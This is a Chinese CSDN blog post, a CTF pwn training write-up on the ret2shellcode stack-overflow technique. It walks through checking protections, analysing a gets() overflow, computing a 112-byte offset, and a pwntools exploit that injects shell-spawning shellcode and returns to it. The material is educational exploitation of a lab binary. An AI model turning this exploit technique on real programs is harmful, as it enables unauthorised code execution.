ret2shellcode

最新推荐文章于 2024-01-24 17:14:26 发布
最新推荐文章于 2024-01-24 17:14:26 发布
阅读量173 收藏
点赞数
分类专栏: CTF-PWN-刷题-XMCVE培训课
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49959202/article/details/119686580
版权

文章目录

ret2shellcode

shellcode:在栈溢出的攻击技术中通常是要控制函数的返回地址到自己想要的地方执行自己想要执行的代码。ret2shellcode代表返回到shellcode中即控制函数的返回地址到预先设定好的shellcode区域中去执行shellcode代码,这是非常危险的。

1.保护机制

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4UzJhYXX-1628871725391)(https://i.loli.net/2021/07/05/Wl4nVtSE2vOMgUB.png)]

发现NX关闭,那么堆栈上可以直接执行。考虑直接在栈上执行shellcode

2.ida分析

使用ida分析,发现危险函数gets()。同时,还有strncpy()函数将s字符串拷贝到buf2上。s字符串的长度为64h,buf2的长度为64h。

既然堆栈可以执行,那么考虑将shellcode写入到buf2处。然后劫持retutn,让他返回到buf2处执行shellcode

发现buf2的地址为:0x0804A080

3.exp编写

那么栈帧就是:

使用gdb调试,计算出想要淹没ebp需要的长度为:$ 0xffffd2b8 - 0xffffd24c + 4 = 112$

编写exp如下:

from pwn import *
 
io = process("pwn/ret2shellcode/ret2shellcode")
io.recv()
shellcode = asm(shellcraft.sh())
buf2 = 0x0804A080
payload = shellcode.ljust(112, b'A') + p32(buf2)
io.sendline(payload)
io.interactive()
「已注销」
关注
专栏目录
pwn小白入门04---ret2shellcode
weixin_45943522的博客
02-21 1956
原理 ret2shellcode,当程序当中没有system函数时,我们需要自己往栈上写入一段shellcode,然后控制eip使其指向shellcode的地址。 shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。 在栈溢出的基础上,要想执行 shellcode,需要对应的程序在运行时,shellcode 所在的区域具有可执行权限。即必须关闭堆栈不可执行功能。 例题(来自ctfwiki): 首先checksec: 发现程序没有开启任何保护,并且存在可读可写
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 857
CTF-wiki的注解:ret2shellcode
Ret2ShellCode
钞sir的博客
01-24 8272
红颜祸 千般柔情 相思难解两相若 蝶恋花 几经浮沉 枯骨终是化飞沙 简介 ret2shellcode顾名思义,就是return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcode,得到system(sh)的效果;ret2shellcode是栈溢出中一种简单而且常规的操作,当配合ROP等技术的使用后,非常有用 利用条件 ret2shel...
ret2shellcode知识点及例题
weixin_44864859的博客
05-19 866
ret2shellcode 检查程序的基础信息后发现和ret2text不同的是其关闭了nx防护,这就代表IP寄存器可以指向堆,栈了。 运行程序可以看到只有一个输入,接下来用ida打开进行分析。 与ret2text一样可以很明显的看到在main函数中调用了gets函数。我们同样可以控制返回地址,但返回到什么地方呢? 查看内部函数可以看到,此时程序中并没有用到system函数,那应该怎么办呢? 这里需要注意有两个点 1 NX: NX disabled 2 strncpy(buf2, &a
PWN ret2shellcode
prettyX的博客
11-22 1985
今天天气阴,来做一下ret2shellcode。 记录一下。 : ) 0X00 ret2shellcode原理 ret2shellcode,就是,return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcodeshellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。 ret2shellcode...
buuctf wustctf2020_getshell_2 ret2shellcode
weixin_45441024的博客
12-01 679
BUUCTF wustctf2020_getshell_2 check一下,32位的程序且没有开任何保护 用ida打开,vuln很明显这是一个漏洞函数,f5查看一下伪代码,可以看到buf距离栈底0x18个字节 这是shell函数的伪代码,我们可以看到虽然这个并不是我们想要的shell(不是/bin/sh),但是程序里面有sh的字符串可以供我们利用,那我们现在就查找一下"sh"所在的位置 $ ROPgadget --binary '/home/pwn/Desktop/wustctf2020_getshe
Ret2ShellCode详解
Sakura给爷pwn全场
10-24 408
StackOverFlow之Ret2ShellCode详解: https://www.freebuf.com/vuls/179724.html https://www.jianshu.com/p/7dad572adae9
PWN --- ret2shellcode
qq_41696518的博客
06-28 925
PWN ret2shellcode
[二进制安全学习]ret2shellcode
Y4tacker的博客
07-15 1226
文章目录写在前面ret2shellcode利用原理利用关键例题参考文章 写在前面 懒狗的第二篇学习,开冲 ret2shellcode 利用原理 ret2shellcode,即控制程序执行 shellcode 代码。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码。 在栈溢出的基础上,要想执行 shellcode,需要对应的 binary 在运行时,shellcode 所在的区域具有可执行权限。 利用关键 1、程序存在溢出,并且还要能够控
好好说话之ret2shellcode
hollk’s blog
06-22 1786
本题为ret2shellcode-example 题目路径 /ctf-challenges/pwn/stackoverflow/ret2shellcode/ret2shellcode-example 一、原理 ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shell...
pwn ret2shellcode
小龙在线
09-12 433
ret2shellcode适用前提 不存在system等危险函数,注入shellcode 查看文件格式 查看CPU架构和安全机制 查看溢出漏洞位置 IDA打开ret2shellcode,搜索危险函数,不存在: main函数里,F5反编译,找到溢出点:gets 同时也能计算出EBP的偏移:0x1c + 0x64 = 查看EBP偏移: gdb ret2shellcode cyclic 200 r # 200个字符 cyclic -l caab 32位程序的EBP宽度是4个字节。 所以到EIP的偏移是
简单的PWN学习-ret2shellcode
weixin_48421613的博客
07-05 887
最近在学习pwn,这是一道2016年的pwn题目,主要学习关于栈溢出以及劫持栈指针达到命令执行的效果,笔者水平较差,请轻喷
ret2shellcode 学习
最新发布
akdelt的博客
01-24 588
shellcode 之前提了,ret2shellcode是指攻击者需要自己将调用shell的机器码(也称shellcode)注入至内存中,随后利用栈溢出复写return_address,进而使程序跳转至shellcode所在内存。若某个程序的bss段可写且可执行,攻击者就可以尝试将shellcode注入写入全局变量或静态变量中。若某个程序的heap段可写且可执行,攻击者就可以尝试将shellcode注入至动态分配的变量中。在虚拟内存中,data段主要保存的是已经初始化了的全局变量或静态变量。
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2144
pwn 入门
ROP-基础-ret2shellcode
ATFWUS的博客
02-28 801
文件下载地址: 链接:https://pan.baidu.com/s/1McW3vCgUvTMRpLJcacN9rg 提取码:didr 0x01.checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值